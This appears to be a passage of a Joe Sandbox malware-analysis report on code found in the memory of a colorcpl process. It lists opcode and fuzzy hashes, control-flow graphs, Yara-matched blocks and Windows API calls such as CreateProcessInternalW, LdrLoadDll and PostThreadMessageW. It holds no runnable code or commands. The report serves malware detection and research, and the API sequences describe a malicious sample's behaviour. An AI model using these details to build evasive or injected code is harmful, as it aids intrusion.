                                                                                                                                                                          • Opcode ID: eea7f53f7ce4f2a30b208bcf79b0ed7ffe4ca48ad33b181ba1fd90e34f0561bc
                                                                                                                                                                          • Instruction ID: a5e2d774316e5360b83d5d07190d88122d832e9375e37e67318a0ec423900f17
                                                                                                                                                                          • Opcode Fuzzy Hash: eea7f53f7ce4f2a30b208bcf79b0ed7ffe4ca48ad33b181ba1fd90e34f0561bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 91900221211C0056F20075694C14B1B00058BD1307F55C615A1159654CC915D9A56522
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 707827e8996cd5d163bceae02e853526696e71c8eb241bf5642436c01bfae7c5
                                                                                                                                                                          • Instruction ID: 8bb52b03b04eb97f5bdee456885803c9148213252b437f4019f5fdee4173d096
                                                                                                                                                                          • Opcode Fuzzy Hash: 707827e8996cd5d163bceae02e853526696e71c8eb241bf5642436c01bfae7c5
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B90026134140456F10071594414B1A0005CBE2305F55C515E2069654D8619DD967127
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 980e773366e8bdd569e3cdde9292ce64543b253dd2eb6991d69b3538808f3550
                                                                                                                                                                          • Instruction ID: a2c848baf6e4ac350b641c075683fc3af0026c81093720c02718203e0abfd8cb
                                                                                                                                                                          • Opcode Fuzzy Hash: 980e773366e8bdd569e3cdde9292ce64543b253dd2eb6991d69b3538808f3550
                                                                                                                                                                          • Instruction Fuzzy Hash: 53900225211400172105B559070451B00468BD6355355C521F201A650CD621D9A56122
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: d298f4bd05128672a222e4ad6cbf8165658a5e55d0405b18693c15838e8ab687
                                                                                                                                                                          • Instruction ID: c36a3e4e214e6d57762d5c9e5bd816e897aa9ed37b9bbf983b7aaaac2409ceaa
                                                                                                                                                                          • Opcode Fuzzy Hash: d298f4bd05128672a222e4ad6cbf8165658a5e55d0405b18693c15838e8ab687
                                                                                                                                                                          • Instruction Fuzzy Hash: 0590023120544856F14071594404A5A00158BD1309F55C511A1069794D9625DE99B662
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 6d885d886b6ec8bd317ead9da050d9d022720a6081e84b724889742dec96ac8c
                                                                                                                                                                          • Instruction ID: 073ee056fa7f4b292c164b5be30022313d8b40e1c34c3d67f47f36b14f7469c7
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d885d886b6ec8bd317ead9da050d9d022720a6081e84b724889742dec96ac8c
                                                                                                                                                                          • Instruction Fuzzy Hash: E690023120140816F1807159440465E00058BD2305F95C515A102A754DCA15DB9D77A2
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: ad005e60b4c37aa854ffeb92fde0e237c010dafa56d819da11cc55447e4d566f
                                                                                                                                                                          • Instruction ID: f03d43fce1c4b196d45cd53919f0902ed727f5ac75bc975220a5ae50743c6c17
                                                                                                                                                                          • Opcode Fuzzy Hash: ad005e60b4c37aa854ffeb92fde0e237c010dafa56d819da11cc55447e4d566f
                                                                                                                                                                          • Instruction Fuzzy Hash: 639002612024001761057159441462A400A8BE1205B55C521E2019690DC525D9D57126
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4551625588.0000000004860000.00000040.00001000.00020000.00000000.sdmp, Offset: 04860000, based on PE: true
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.0000000004989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.000000000498D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000005.00000002.4551625588.00000000049FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4860000_colorcpl.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 0660ef8f79e482a8ff4329b480679ddb285e613475a1357f21ef8d0e0d2d28aa
                                                                                                                                                                          • Instruction ID: 2e78869a238973d7ad1079f276c8a13f5a7113937b9c3c23357145356538b27f
                                                                                                                                                                          • Opcode Fuzzy Hash: 0660ef8f79e482a8ff4329b480679ddb285e613475a1357f21ef8d0e0d2d28aa
                                                                                                                                                                          • Instruction Fuzzy Hash: 1890023160550416F1007159451471A10058BD1205F65C911A1429668D8795DA9575A3

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 417 2889070-288909f 418 28890ab-28890b2 417->418 419 28890a6 call 288bd30 417->419 420 28890b8-2889108 call 288be00 call 287ace0 call 2884e40 418->420 421 288918c-2889192 418->421 419->418 428 2889110-2889121 Sleep 420->428 429 2889123-2889129 428->429 430 2889186-288918a 428->430 431 288912b-2889151 call 2888c90 429->431 432 2889153-2889173 429->432 430->421 430->428 434 2889179-288917c 431->434 432->434 435 2889174 call 2888ea0 432->435 434->430 435->434
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 02889118
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                                          • Opcode ID: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
                                                                                                                                                                          • Instruction ID: c090a902ba2c3ba224a79a0879f547ba99bc56a4d64cc1509a4faf42177499aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ed7dba718d4673b5d47752fdb7b5f00bd3c950a8118c2bc15652b3783fcf2b9
                                                                                                                                                                          • Instruction Fuzzy Hash: E9318FBA904645BBC724EF68C885F77B7B9BB88B04F00841DF62E9B244D734A550CBA5

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 437 2889066-28890b2 call 288bd30 440 28890b8-2889108 call 288be00 call 287ace0 call 2884e40 437->440 441 288918c-2889192 437->441 448 2889110-2889121 Sleep 440->448 449 2889123-2889129 448->449 450 2889186-288918a 448->450 451 288912b-2889151 call 2888c90 449->451 452 2889153-2889173 449->452 450->441 450->448 454 2889179-288917c 451->454 452->454 455 2889174 call 2888ea0 452->455 454->450 455->454
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 02889118
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                                          • Opcode ID: ff6d840da868ecd8056f661e5ce4ca667d8f1387524356941f42809760c81a3c
                                                                                                                                                                          • Instruction ID: 386e608a4926a2b1b8c49a510fc65e673808ce12e2a54975b46d452240e2e73e
                                                                                                                                                                          • Opcode Fuzzy Hash: ff6d840da868ecd8056f661e5ce4ca667d8f1387524356941f42809760c81a3c
                                                                                                                                                                          • Instruction Fuzzy Hash: 1421E17E944205BBC714EF68C885B7BF7B5BB88704F00801DE62DEB244D774A510CB94

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 563 288a652-288a655 564 288a66d-288a677 call 288af50 563->564 565 288a657-288a65e 563->565 567 288a67c-288a691 RtlFreeHeap 564->567 565->564
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02873AF8), ref: 0288A68D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                                                                          • Opcode ID: 97ba378d3454331f77f7e3715e2eb1b0f3aaef5fd42128a76d59f68908f2aafa
                                                                                                                                                                          • Instruction ID: 1ee2b515dfc61b682737c19a8867cc1d28f44403c2b17612de96eeab7fd35db3
                                                                                                                                                                          • Opcode Fuzzy Hash: 97ba378d3454331f77f7e3715e2eb1b0f3aaef5fd42128a76d59f68908f2aafa
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AE0DFFD2482449FC715EF68AC808AB7795AF81305314464AE85D87783D632D9168AE2

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 568 288a660-288a676 569 288a67c-288a691 RtlFreeHeap 568->569 570 288a677 call 288af50 568->570 570->569
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02873AF8), ref: 0288A68D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                          • String ID: .z`
                                                                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                          • Instruction ID: 96e3d60a32ce5d733fbea70a3b898c1689417702cef9d998692985abf1d41db3
                                                                                                                                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                          • Instruction Fuzzy Hash: FDE01AB5200204ABD718EF59CC44EA777ADAF88750F014555B91C57241C631E9108AB0

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0287836A
                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0287838B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                          • Opcode ID: 322433f781b1f9ff2a1c48445a0b13c92616ab2949e2bf2a417403e70c3a4530
                                                                                                                                                                          • Instruction ID: 79397f4858421697f500566a8a09aa87eec91c3d36f6ae742a89050a8917d367
                                                                                                                                                                          • Opcode Fuzzy Hash: 322433f781b1f9ff2a1c48445a0b13c92616ab2949e2bf2a417403e70c3a4530
                                                                                                                                                                          • Instruction Fuzzy Hash: B201D47AA802287BE720A698DC46FBE772C5B40B55F084159FF04FA1C1E6A4A9054BF2

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 586 2878310-287831f 587 2878328-287835a call 288c9f0 call 287ace0 call 2884e40 586->587 588 2878323 call 288be50 586->588 595 287838e-2878392 587->595 596 287835c-287836e PostThreadMessageW 587->596 588->587 597 2878370-287838b call 287a470 PostThreadMessageW 596->597 598 287838d 596->598 597->598 598->595
                                                                                                                                                                          APIs
                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0287836A
                                                                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0287838B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                          • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                                                                                                                                          • Instruction ID: b813e1b0abfce2963ba82e565f6a3552748caa54fc2a6e3a50dbb20a8c3a62bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C01F73AA8022877E720B6989C42FBE772C5B40B50F080114FF04FA1C1E694A90547F6
                                                                                                                                                                          APIs
                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0287AD52
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Load
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                          • Instruction ID: 4eace13eae09b565b505b5f584b446c7aef254c659a1efb319ed00ff560e1964
                                                                                                                                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                                                          • Instruction Fuzzy Hash: 67015EBED4020DABDB14EAA4EC41FDEB7799B44308F108195E90CD7281FA31EB04CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0288A724
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2186235152-0
                                                                                                                                                                          • Opcode ID: d3898e4ace954a7836974b04f9f9f579095e7f12570faffb3f56e81a2460965e
                                                                                                                                                                          • Instruction ID: e47a9cf744c995a69e8d6b8d964cd0a357518a4be4d80bdf3566b2a6bcb51bd7
                                                                                                                                                                          • Opcode Fuzzy Hash: d3898e4ace954a7836974b04f9f9f579095e7f12570faffb3f56e81a2460965e
                                                                                                                                                                          • Instruction Fuzzy Hash: A901AFB6204108BFCB58DF99DC80EEB77A9AF8C354F158258FA0DE7251C630E851CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0288A724
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2186235152-0
                                                                                                                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                          • Instruction ID: 5368d07dc667a65cc999943966b76912fb03a7c3f84a4dea7fee32694a36ff67
                                                                                                                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                                          • Instruction Fuzzy Hash: CA01AFB6210108AFCB58DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0287F040,?,?,00000000), ref: 028891DC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                          • Opcode ID: c39c9f5f3adaadccba5dac45abb76fed316553857b04ac2a1f973720f9d47200
                                                                                                                                                                          • Instruction ID: 10ff451715ec40a1bab34e32c0c1b33912949ad55fb688586b103bc78fcbf977
                                                                                                                                                                          • Opcode Fuzzy Hash: c39c9f5f3adaadccba5dac45abb76fed316553857b04ac2a1f973720f9d47200
                                                                                                                                                                          • Instruction Fuzzy Hash: F9E06D3B3902043AE320759DAC02FA7B39D8B91B20F550026FB0DEB6C0D595F40146A5
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0287F040,?,?,00000000), ref: 028891DC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                          • Opcode ID: edc82f253d86e512b91027fd177c5eace931d732826d63aca046e3f84120e587
                                                                                                                                                                          • Instruction ID: 7beb060bfc1ba68856224ddb4f8f47a818924db39f05c9e85d956b6d49fad308
                                                                                                                                                                          • Opcode Fuzzy Hash: edc82f253d86e512b91027fd177c5eace931d732826d63aca046e3f84120e587
                                                                                                                                                                          • Instruction Fuzzy Hash: CBF0653F7D46047BE23065589C42FB7779A8BD4B10F250029F60AEB7C0D695B90546A5
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(02884526,?,02884C9F,02884C9F,?,02884526,?,?,?,?,?,00000000,00000000,?), ref: 0288A64D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                          • Instruction ID: 3c19b0e8a592e16ad846a602f20ae267d29d3dd6d61c634ed738d82375fc9113
                                                                                                                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                                          • Instruction Fuzzy Hash: 68E012B6200208ABDB18EF99CC40EA777ADAF88654F118559BA1C9B281C631F9108AB0
                                                                                                                                                                          APIs
                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0287F1C2,0287F1C2,?,00000000,?,?), ref: 0288A7F0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                          • Opcode ID: 38d3ada025e11c132e22fd61a84fe4aa3e5de14d8ac96328a7c1d1c2e157c71f
                                                                                                                                                                          • Instruction ID: b5e3e992c5a8b04bc49a4f8324ec554c3028eb025b15fc62bc2f4fcce70664b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 38d3ada025e11c132e22fd61a84fe4aa3e5de14d8ac96328a7c1d1c2e157c71f
                                                                                                                                                                          • Instruction Fuzzy Hash: C9E09AB5200204ABCB10EF48CC84EE737A9EF88220F008094FE4C57642C631E8158BF1
                                                                                                                                                                          APIs
                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0287F1C2,0287F1C2,?,00000000,?,?), ref: 0288A7F0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                          • Instruction ID: a520957ad79e3cd90bf5c3162e0157b49edbf53447284a91092048320766c4d6
                                                                                                                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                                          • Instruction Fuzzy Hash: 11E01AB5200208ABDB14EF49CC84EE737ADAF88650F018155BA0C57241C935E8108BF5
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,02878D14,?), ref: 0287F6EB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_5_2_2870000_colorcpl.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                                                          • Instruction ID: 27569a6160c51fd01d3a75d51962673570386b6568d4cc833f1f5235c98b2277
                                                                                                                                                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                                                          • Instruction Fuzzy Hash: 06D05E6A6903042BEA10BAA99C02F2632896B54A14F490064FA48D72C3E954E0004565
                                                                                                                                                                          APIs
